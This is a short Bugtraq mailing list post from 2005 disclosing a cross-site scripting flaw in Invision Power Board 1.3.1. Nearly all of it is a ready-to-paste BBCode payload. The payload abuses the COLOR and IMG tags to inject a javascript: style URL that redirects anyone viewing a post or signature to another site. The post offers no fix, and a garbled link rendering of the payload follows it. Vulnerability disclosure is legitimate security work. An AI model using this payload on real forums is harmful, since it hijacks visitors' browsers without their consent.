Bugtraq mailing list archives
Invision Power Boards 1.3.1 FINAL XSS Exploit
From: Daniel A. <ldrada () gmail com>
Date: 18 Feb 2005 02:37:48 -0000
Description: Lack of checking in the SML codes. Exploit: Put this into any signature or post on an invision forum: [COLOR=[IMG]http://aaa.aa/=`aaa.jpg[/IMG]]`style=background:url("javascript:document.location.replace('http://www.hackthissite.org');") [/color] Fix: I'm not good at regexes :)
![http://aaa.aa/=`aaa.jpg[/IMG]]`style=background:url](http://aaa.aa/=`aaa.jpg[/IMG]]`style=background:url){kind=link}
Current thread:
- Invision Power Boards 1.3.1 FINAL XSS Exploit Daniel A . (Feb 17)